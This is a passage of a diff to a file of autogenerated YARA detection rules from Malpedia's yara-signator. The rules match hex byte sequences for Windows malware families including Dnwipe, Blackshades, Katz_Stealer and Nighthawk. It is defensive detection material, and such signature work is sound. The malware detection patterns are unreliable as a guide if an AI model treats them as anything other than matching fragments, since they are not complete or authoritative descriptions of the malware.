+		$sequence_9 = { 83f81f 0f87e5020000 51 56 e8???????? 83c408 c745b800000000 }
 
 	condition:
-		7 of them and filesize < 528384
+		7 of them and filesize < 574464
 }
-rule MALPEDIA_Win_Alreay_Auto : FILE
+rule MALPEDIA_Win_Dnwipe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e56c2c54-ad52-5b52-a7dc-5167ef6188a3"
+		id = "1dfcf0b7-155d-5531-9418-b3b6f7b47f6c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alreay_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnwipe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dnwipe_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "691ad5e65c868108d2cf9f6c8d61af6c7a9420c74e344971bfa56b9838124959"
+		logic_hash = "a0d87818c953765cbf35eb3a0b4d4fff142998a549a84312b85c4d079e960955"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123699,32 +123605,32 @@ rule MALPEDIA_Win_Alreay_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a4f06 0bc2 33d2 8b742414 8a7704 8a5705 c1e208 }
-		$sequence_1 = { 0f859ffdffff 8b8538010000 3bc3 741d 83f801 7418 899de8010000 }
-		$sequence_2 = { 8b6c2424 898760020000 8b442420 896e58 8b6c242c 896e68 89861c010000 }
-		$sequence_3 = { 8bd0 0bd3 0f8419010000 33c9 8bd3 894c2420 894c2424 }
-		$sequence_4 = { b926020000 33c0 8bfe f3ab 8dbe10020000 57 e8???????? }
-		$sequence_5 = { 8b542418 51 57 52 ff15???????? 85c0 7508 }
-		$sequence_6 = { 8d4c2414 56 33ed 8b38 895c244c 894c2414 e8???????? }
-		$sequence_7 = { 897c2418 89bc3490000000 8b7c241c 8bf7 8bdf c1e615 c1eb0b }
-		$sequence_8 = { 8b7e34 3bfb 7436 8b4760 3bc3 740f 50 }
-		$sequence_9 = { 8beb 8aa760954700 33e8 c1e508 33c0 33db 8a442411 }
+		$sequence_0 = { 1306 16 1307 2b22 1106 }
+		$sequence_1 = { 00 2b37 00 7e01000004 281c00000a 720f000070 }
+		$sequence_2 = { 00 00 2b37 00 }
+		$sequence_3 = { 58 0d 09 07 8e 69 fe04 }
+		$sequence_4 = { 281b00000a 00 00 00 de04 }
+		$sequence_5 = { 110c 9a 6f2400000a 7285000070 6f2900000a 3a01010000 110a }
+		$sequence_6 = { 00 2b09 00 17 }
+		$sequence_7 = { 09 1304 16 1305 2b74 }
+		$sequence_8 = { 8e 69 3284 00 de05 26 }
+		$sequence_9 = { 09 9a 732200000a 1304 07 09 9a }
 
 	condition:
-		7 of them and filesize < 1867776
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Cotx_Auto : FILE
+rule MALPEDIA_Win_Avzhan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7eae7fd5-fe09-5035-acc7-8021961f04a4"
+		id = "84066c6e-b6ba-5768-970d-dec408a0e7ed"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cotx_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avzhan_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "1c95a0f1a2e7fb0ee9c8ab7674fdf844ade84df8607e565506c61944d3da6b96"
+		logic_hash = "a735be6148b9160f001fa1a5adca0dca85c778e318efdbf988b4428d95a16bfa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123738,32 +123644,32 @@ rule MALPEDIA_Win_Cotx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 8d45e0 50 ff15???????? 0fb745ee }
-		$sequence_1 = { c705????????69e053a4 c705????????120d934e c705????????b0b65443 c705????????4df9e511 c705????????0e9a3f4b }
-		$sequence_2 = { 83e103 f3a4 8dbd98faffff 4f }
-		$sequence_3 = { c705????????9cb95b4c c705????????2d494a94 c705????????8db133d4 c705????????8e220b1d c705????????6825794d c705????????4506ce62 }
-		$sequence_4 = { 8d85bcf3ffff 50 ff15???????? 8bf0 }
-		$sequence_5 = { c705????????f0e91f15 c705????????9cb95b4c c705????????2d494a94 c705????????8db133d4 c705????????8e220b1d }
-		$sequence_6 = { 68???????? 56 e8???????? 6800f00000 81c690ef0000 68???????? }
-		$sequence_7 = { c785b8faffff39313044 c1e902 f3a5 8bca }
-		$sequence_8 = { 6800040000 8d8598f6ffff 6a00 50 e8???????? 83c40c 8d8598feffff }
-		$sequence_9 = { e8???????? 6890ef0000 8d7760 68???????? }
+		$sequence_0 = { eb1d 6a02 e8???????? 83c008 }
+		$sequence_1 = { 51 8d8c2404020000 51 56 }
+		$sequence_2 = { e8???????? 83c003 33d2 0fafc6 f7742408 }
+		$sequence_3 = { c744243844000000 f3ab 8b442464 8b3d???????? }
+		$sequence_4 = { ffd7 6a00 8b542414 52 ffd3 6a0a ffd7 }
+		$sequence_5 = { 8d8c2418020000 6a00 51 6a00 ffd5 85c0 }
+		$sequence_6 = { 49 50 8bd9 e8???????? }
+		$sequence_7 = { 6a14 ff15???????? 833d????????01 75d2 }
+		$sequence_8 = { e8???????? 8bf0 6a64 81c600040000 e8???????? }
+		$sequence_9 = { 83c418 3935???????? 7450 8b942464010000 }
 
 	condition:
-		7 of them and filesize < 1171456
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Deltas_Auto : FILE
+rule MALPEDIA_Win_Woolger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71773355-27de-50f9-b937-a4b31a08be87"
+		id = "69dafade-30c5-5734-830c-150b438e6d59"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deltas_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.woolger_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "110bf37db48ce7c93aacf644fe14f61a7699258651c7d440500f0fe2335e7ad7"
+		logic_hash = "a68ced9b21a66c947cc315eb8f76a9ad3604356e88ce1c4ffa9af9c48a2ada10"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123777,32 +123683,32 @@ rule MALPEDIA_Win_Deltas_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 56 8bf1 57 b940000000 33c0 }
-		$sequence_1 = { 55 53 ff15???????? 85c0 7419 }
-		$sequence_2 = { 66ab 8d8c247c010000 6804010000 51 c64424146d }
-		$sequence_3 = { eb45 8b8c249c000000 8d442454 8d7c2454 bd10000000 8d7102 }
-		$sequence_4 = { 85c0 0f8485010000 8b9884000000 8b8888000000 81c38c000000 83f906 0f8733010000 }
-		$sequence_5 = { c1ef14 c1e10c 0bf9 8b4828 03fe 894c2438 8bcf }
-		$sequence_6 = { 8b7824 03f3 897c241c 8bfe 23ee f7d7 }
-		$sequence_7 = { 88442423 8d442408 b164 b261 50 c644240c6b c644240e72 }
-		$sequence_8 = { 3bc3 7413 8d542438 52 8b542444 53 53 }
-		$sequence_9 = { 750e 8d4c2464 51 ffd6 898424c0000000 8d9424b0000000 52 }
+		$sequence_0 = { 46 8b5510 52 6a00 ff15???????? }
+		$sequence_1 = { ff15???????? 6800040000 8bf0 e8???????? 83c404 }
+		$sequence_2 = { 0f84e6000000 3da5000000 0f84db000000 83f85b 0f84cb000000 }
+		$sequence_3 = { 8b07 83f808 750a be???????? e9???????? }
+		$sequence_4 = { e9???????? 83f80d 750a be???????? e9???????? 83f814 }
+		$sequence_5 = { 750a be???????? e9???????? 83f828 750a be???????? }
+		$sequence_6 = { 0f848e000000 56 57 b980000000 8db5fcfdffff bf???????? }
+		$sequence_7 = { 57 0fb7d6 6a02 52 ff15???????? }
+		$sequence_8 = { be???????? e9???????? 83f809 750a be???????? e9???????? 83f80a }
+		$sequence_9 = { 83f828 750a be???????? e9???????? 83f82c 750a be???????? }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Felismus_Auto : FILE
+rule MALPEDIA_Win_Meltingclaw_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "705e1888-c3cf-5bf6-ba18-e8626acda3dd"
+		id = "4c934307-6162-5bd3-9838-14fb4893e749"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.felismus_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meltingclaw"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.meltingclaw_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "fddb824340564e372ed310ad021f3b3ac8af1c9316519efd06d812e4eb93bb2c"
+		logic_hash = "b6f3eb32e00edec50809c43ad1e4398bb12b63738a427d7db6e1e036df7e69e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123816,32 +123722,32 @@ rule MALPEDIA_Win_Felismus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4514 8b35???????? 50 ff15???????? e9???????? 6804010000 e8???????? }
-		$sequence_1 = { 03c3 5f 894d04 895508 89450c 5e 5d }
-		$sequence_2 = { 53 56 57 6804010000 e8???????? 8b7c241c 8bd8 }
-		$sequence_3 = { 83c640 83c740 3bf5 7ce6 8b4c2418 33c0 eb02 }
-		$sequence_4 = { 8d842430010000 50 33f6 ffd7 85c0 7e26 8a843430010000 }
-		$sequence_5 = { 8a46ff 83e03f 41 4f 8a907c520110 8851ff }
-		$sequence_6 = { 55 8b2d???????? 56 57 6804010000 ffd5 8bf0 }
-		$sequence_7 = { 56 ffd7 8d4c241c 6a00 51 6a02 }
-		$sequence_8 = { 740a 3818 7406 ff15???????? b8???????? c3 }
-		$sequence_9 = { 8bd8 b93f000000 33c0 8bfb f3ab 66ab 83c404 }
+		$sequence_0 = { 0f8484000000 ffc1 4c63e1 498bcc e8???????? }
+		$sequence_1 = { 488d8da8000000 48ffc9 48ffc1 803900 }
+		$sequence_2 = { 33c9 ff15???????? 488d8d80000000 8bd8 e8???????? }
+		$sequence_3 = { 8bfa 488bd9 33d2 41b804010000 488d4c2470 e8???????? 660f6f05???????? }
+		$sequence_4 = { 488364243000 4533c9 44896c2428 4533c0 8364242000 }
+		$sequence_5 = { 880411 48ffc2 84c0 75f3 488d8da8000000 }
+		$sequence_6 = { 23c1 41c1ff0c 2bc2 448bf0 418d6f01 4883ffff }
+		$sequence_7 = { 80c121 418809 49ffc1 b90d000000 490fbe41ff 33d2 }
+		$sequence_8 = { 750e 48396928 7508 48396930 b001 7403 }
+		$sequence_9 = { 6bc83f 49c70700010000 80c121 418809 49ffc1 b90b000000 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 348160
 }
-rule MALPEDIA_Win_Ariabody_Auto : FILE
+rule MALPEDIA_Win_Sinowal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b288143a-494f-5110-aa08-78c947a2ffad"
+		id = "1f893f7f-89f2-5c9f-9fc2-27e806579cce"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ariabody_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sinowal_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "01493614906849451d77f5112637b662b1eef5ef050791957456a657828f7e1a"
+		logic_hash = "54091d4d3127abdf4debf8514f31e0539d3fa9d766e80cf864467b06870782b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123855,38 +123761,32 @@ rule MALPEDIA_Win_Ariabody_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3ac3 7402 32c3 88040a }
-		$sequence_1 = { 8bd9 e8???????? 8bf8 893b }
-		$sequence_2 = { 8d55fc 03f9 e8???????? 59 85c0 }
-		$sequence_3 = { 0138 115804 eb02 0138 }
-		$sequence_4 = { 55 8bec 83ec50 53 57 8bd9 }
-		$sequence_5 = { ff75d9 8d45cc 50 57 }
-		$sequence_6 = { 56 8d0c30 ffd1 8bc6 5f }
-		$sequence_7 = { 8bf8 893e eb13 8b16 8bcf }
-		$sequence_8 = { 448850d2 448850d3 448850d4 448850d5 448850d6 448858d7 }
-		$sequence_9 = { 33d2 4c8d4c2420 4d895108 4889f1 4533c0 ff9550010000 4c8b542428 }
-		$sequence_10 = { e8???????? ba0a000000 4c8d15e189ffff 385558 }
-		$sequence_11 = { 415c 5f 5e c3 4c89e2 }
-		$sequence_12 = { 48c7c103000080 33d2 4c8d842498000000 4c8d8c24bc010000 4c897020 4c897028 }
-		$sequence_13 = { c78424bc01000000010000 488d8c2498000000 488d542448 ff95b8010000 4989e2 }
-		$sequence_14 = { 85c0 752e 4889e9 4889f2 }
-		$sequence_15 = { 4889742448 4489de 48897c2440 4489d7 4c89642438 4189c4 }
+		$sequence_0 = { ff15???????? 85c0 0f85b3000000 837df800 }
+		$sequence_1 = { c7854cfdffff28000000 83bd4cfdffff03 7305 e9???????? 8b8d4cfdffff }
+		$sequence_2 = { 8b45fc 83c001 8945fc 8b4d0c d1e9 394dfc }
+		$sequence_3 = { 33d2 7596 837de800 7417 8b4508 8b08 }
+		$sequence_4 = { 8995ecfeffff c785c4feffff00000000 c745fc00000000 c745f800000000 c685f0feffff00 68ff000000 6a00 }
+		$sequence_5 = { 50 e8???????? 83c40c c745fc01000000 c745f804010000 8d4df8 }
+		$sequence_6 = { 51 ff15???????? 33c0 eb03 83c8ff }
+		$sequence_7 = { 52 ff15???????? c745f400000000 eb09 8b45f4 }
+		$sequence_8 = { 7405 e9???????? 6830020000 6a00 }
+		$sequence_9 = { 8b4dfc 0fb611 33d0 8b45fc 8810 8b4dfc }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Blackshades_Auto : FILE
+rule MALPEDIA_Win_Pykspa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "be0044cc-ffdd-5ce8-9261-6f20deb49ec5"
+		id = "50716d19-baac-512e-9696-08ac9e2a4a98"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackshades_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pykspa_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "5be1fd8de19e4a88da957f4843427153e72a697b528878c27f4d0e3032429536"
+		logic_hash = "224d3991c62a8b8f8f63073971c195da5bc5aec2fb8743f9bc32c0631a402ab6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123900,32 +123800,32 @@ rule MALPEDIA_Win_Blackshades_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff9e0460ff34 6c 60 ff0a }
-		$sequence_1 = { 08fe f5 0200 0000 6c 70ff 9e }
-		$sequence_2 = { 70ff f30004eb f4 02eb fb cf }
-		$sequence_3 = { 351cff1e55 2c00 0d6c04ff1b c700fb301cc9 }
-		$sequence_4 = { 58 2f 60 ff6c74ff }
-		$sequence_5 = { 2a23 60 ff1b 0d002a460c fff5 0200 0000 }
-		$sequence_6 = { 6c ff4a71 70ff 00746c78 ff1b }
-		$sequence_7 = { 6c ff4a71 70ff 00746c78 ff1b 4a }
-		$sequence_8 = { ff6c48ff 6c 4c ff40fc }
-		$sequence_9 = { ff1b 0d002a460c fff5 0200 0000 6c }
+		$sequence_0 = { 32c0 eb0d 2b4508 8d443004 39450c 0f9dc0 }
+		$sequence_1 = { ff7524 68???????? e8???????? 83c40c 8d8500fcffff 50 8d8500d4ffff }
+		$sequence_2 = { 53 ff15???????? e9???????? 8d85a0feffff 68???????? 50 e8???????? }
+		$sequence_3 = { 8bf0 ff15???????? ff75cc 8bf8 e8???????? 3bf3 59 }
+		$sequence_4 = { e9???????? 6a0a 8d45b0 50 8d858ceeffff 50 e8???????? }
+		$sequence_5 = { 8bcb 83e107 c1e102 d3e8 a80f 7503 4b }
+		$sequence_6 = { 50 6aff ff36 53 53 ff15???????? ff7508 }
+		$sequence_7 = { 6a41 8d45bc 50 68???????? e8???????? 83c40c ff15???????? }
+		$sequence_8 = { 53 e8???????? 8903 8d0436 83c40c 894708 6a02 }
+		$sequence_9 = { 7414 8d4580 50 8d4508 50 56 ff7510 }
 
 	condition:
-		7 of them and filesize < 999424
+		7 of them and filesize < 835584
 }
-rule MALPEDIA_Win_Norobot_Auto : FILE
+rule MALPEDIA_Win_Apollo_Shadow_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "81ee252e-ea83-5b53-acab-35755b04ba71"
+		id = "ea905677-b1ee-5a47-bc71-e2c692213f7b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.norobot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.norobot_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apollo_shadow"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.apollo_shadow_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "cfe0160692facfa8b89f040016e3df094319abbfbfe52416eb1da1d5fe06ee4b"
+		logic_hash = "b4c0913bb7700a7eb24e3d781656266dfb7d50769bc9ee1a9816b626000653e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123939,32 +123839,32 @@ rule MALPEDIA_Win_Norobot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c6400800 488b442408 c3 48894c2408 4883ec28 488b442430 488bc8 }
-		$sequence_1 = { 4883c420 5b c3 4883611000 488d0520b20100 48894108 488d0505b20100 }
-		$sequence_2 = { 4d3bc4 0f84ba000000 8b7500 498b9cf620c60300 90 4885db 740e }
-		$sequence_3 = { 4883ec68 488b05???????? 4833c4 4889442450 4883bc248000000000 7f07 }
-		$sequence_4 = { 4c8d4c2428 4c8d442430 488bd0 488b4c2450 e8???????? 488b442450 }
-		$sequence_5 = { 4883bc248800000000 0f8482000000 33c0 83f801 }
-		$sequence_6 = { 4c8d0576750000 41f644400201 7405 0fb6c9 eb25 0fb6d1 }
-		$sequence_7 = { 7536 488d15db130300 488b8c24c0100000 e8???????? 8b442440 83c801 89442440 }
-		$sequence_8 = { 4c8d057b1a0100 488d157c1a0100 b912000000 e8???????? 4885c0 741d 49ba7073d836192e55f3 }
-		$sequence_9 = { e8???????? 0fb6c0 85c0 7448 48837c245000 7507 837c245801 }
+		$sequence_0 = { 8bce e8???????? 4183ceff 488d0590880200 4a8b04f8 42f644e03801 }
+		$sequence_1 = { 48898424e0000000 488bf1 48894c2458 4533f6 4489742430 0f57c0 }
+		$sequence_2 = { 48b8033bae3ba217f877 488945a7 488b75a7 48b8b89c83748f3838d7 488945a7 488b5da7 48b89553bf5390096f5f }
+		$sequence_3 = { 48b8ffffffffffffff7f 483bc8 0f8793000000 4803c9 4881f900100000 7224 488d4127 }
+		$sequence_4 = { 48837d3708 480f43451f 48894d2f 66891c48 eb57 488bd1 }
+		$sequence_5 = { 4053 4883ec20 b908000000 e8???????? 488bd8 4889442430 48c70001000080 }
+		$sequence_6 = { 0f28458f 33ff 4c8d7dc7 48837ddf08 4c0f437dc7 }
+		$sequence_7 = { 448b10 410fb609 83e10f 4a0fbe8431489d0300 428a8c31589d0300 4c2bc8 418b41fc }
+		$sequence_8 = { c744242804000000 488d842480000000 4889442420 41b904000000 4533c0 488b0f ff15???????? }
+		$sequence_9 = { f3410f7f01 f30f7e4108 660f60c0 660f71e008 f3410f7f4110 f30f7e4110 660f60c0 }
 
 	condition:
-		7 of them and filesize < 545792
+		7 of them and filesize < 710656
 }
-rule MALPEDIA_Win_Kikothac_Auto : FILE
+rule MALPEDIA_Win_Gratem_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3a1785b6-f597-5e86-8c4e-a3c4c36845cf"
+		id = "ab5cab4a-386c-5ff0-b7ae-5f5f77749cf9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kikothac_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gratem_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "783b1a1a8c3b3dc323ec01428cfa46b90f3abf925fa4bb401d1a6455aac8c5f6"
+		logic_hash = "faae71a2a37b93e3d77306cf98fe40a8f8f60859a11449c5f85889b06fd54fb4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123978,32 +123878,32 @@ rule MALPEDIA_Win_Kikothac_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 668945de e8???????? 83f8ff 0f84c2000000 803d????????00 }
-		$sequence_1 = { 80ce63 3485 80f601 041b 660fbdd0 }
-		$sequence_2 = { 8b140e 52 8d5dfc e8???????? 83c404 84c0 7509 }
-		$sequence_3 = { 57 8bc2 c1f805 8b0485c0514100 8bfa 83e71f }
-		$sequence_4 = { 660fbae309 8a46ff c1da07 f6c3a7 28d8 51 }
-		$sequence_5 = { 5b 8b7708 8b7f04 84c0 751a e8???????? 84c0 }
-		$sequence_6 = { f5 f6d8 9c 28c3 f9 }
-		$sequence_7 = { 8b4df4 03c2 668b55f8 8908 8a4dfa 66895004 884806 }
-		$sequence_8 = { c64424080e 50 38c6 98 }
-		$sequence_9 = { 660fb6f3 8db30307ad85 c744244800000000 8db7ec8bddf1 8b742474 9c ff3424 }
+		$sequence_0 = { 55 8bec 8b4508 56 8d34c5c0b84000 833e00 7513 }
+		$sequence_1 = { c6040400 8d1424 52 ff15???????? 8b8c2408010000 33cc }
+		$sequence_2 = { 8945fc 85c0 742f 8b0e 8b5710 51 52 }
+		$sequence_3 = { 0fb7048d64bc4000 41 6685c0 75e4 32c0 88460f c3 }
+		$sequence_4 = { ff15???????? 8945fc 85c0 742f 8b0e }
+		$sequence_5 = { 0fb6c0 eb12 8b45e0 8a803cb44000 08443b1d }
+		$sequence_6 = { 663bc2 0f84e6020000 0fb7048d64bc4000 41 6685c0 }
+		$sequence_7 = { 0fb7c0 baa3170000 663bc2 0f84e6020000 0fb7048d64bc4000 41 6685c0 }
+		$sequence_8 = { 0f84de030000 0fb7048d64bc4000 41 6685c0 75e4 }
+		$sequence_9 = { 0f8469010000 0fb7048d64bc4000 41 6685c0 75e4 }
 
 	condition:
-		7 of them and filesize < 581632
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Dexbia_Auto : FILE
+rule MALPEDIA_Win_Katz_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "10b4a5d0-b360-57a4-9e4b-c6a9cc13bd8b"
+		id = "c49e5ae3-476e-56a3-98bc-9b636f776fa6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dexbia_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.katz_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.katz_stealer_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "a367731eb970680df53cbd5e2b030972026c39b111bddedbf1b2202ab2b56805"
+		logic_hash = "fd471cd54233791d0b513e7355b1bd82a81ef2e5ff3948f16fb07b4227562780"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124017,32 +123917,32 @@ rule MALPEDIA_Win_Dexbia_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66ab aa b9ff040000 33c0 8dbc249d260000 be???????? f3ab }
-		$sequence_1 = { 8d8ef8000000 8d9638010000 51 52 e8???????? 83c408 }
-		$sequence_2 = { 8bca 83c020 83e103 8d9424a0120000 f3a4 8d8c24a0260000 }
-		$sequence_3 = { 72c1 8b4508 c705????????01000000 50 a3???????? e8???????? 8db6ec894000 }
-		$sequence_4 = { 60 55 40 008c554000b055 }
-		$sequence_5 = { 81c444040000 68a00f0000 ffd5 e9???????? 53 8d8c2418100000 53 }
-		$sequence_6 = { e8???????? 8d942468040000 50 52 68???????? }
-		$sequence_7 = { 8bb42480010000 8bbc2484010000 c744241400000000 6a64 }
-		$sequence_8 = { 85c0 0f85e5feffff 8bd7 b9ff090000 8dbc2455040000 88842454040000 }
-		$sequence_9 = { 33c0 8d7c247d c644247c00 f3ab 66ab aa }
+		$sequence_0 = { ffd5 85c0 7516 6aff 5a 488b8c2480000000 ff15???????? }
+		$sequence_1 = { 31c9 e8???????? 4893 e9???????? 85f6 }
+		$sequence_2 = { 0f8517ffffff e9???????? 4889f9 ff15???????? 83f8ff 0f84ba030000 85db }
+		$sequence_3 = { 488b4c2470 e8???????? 488b5c2450 8b742460 39b42480000000 }
+		$sequence_4 = { e9???????? 4885d2 0f8429ffffff 488d0562f30000 4889842490000000 4c8b842490000000 }
+		$sequence_5 = { e8???????? 66490f6ec5 66480f6ee7 4889f1 f20f5ec4 488d15dab00000 f20f5905???????? }
+		$sequence_6 = { 488b8424b0070000 488d15663a0000 4889d9 488b04f8 448b4004 e8???????? }
+		$sequence_7 = { f3ab 488d15f64c0000 4889f1 488dbc2494050000 e8???????? 4885c0 7449 }
+		$sequence_8 = { 4c89c7 f3ab 488d0d075d0000 48b80100000006000000 4889842490020000 4c8d8c2480010000 }
+		$sequence_9 = { 4489c8 4883c468 5b 5e c3 f6c701 0f8477010000 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 238592
 }
-rule MALPEDIA_Win_Darkvnc_Auto : FILE
+rule MALPEDIA_Win_Nighthawk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "333202ce-cf04-5e1c-95d5-ed62536bc798"
+		id = "f73d8e8e-0e22-5d8b-a28a-19526ca65051"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkvnc_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nighthawk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nighthawk_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "7d4bb25715c42c98fca5b840dde51c070d19a7e331a44598eca4d1a3afd0df99"
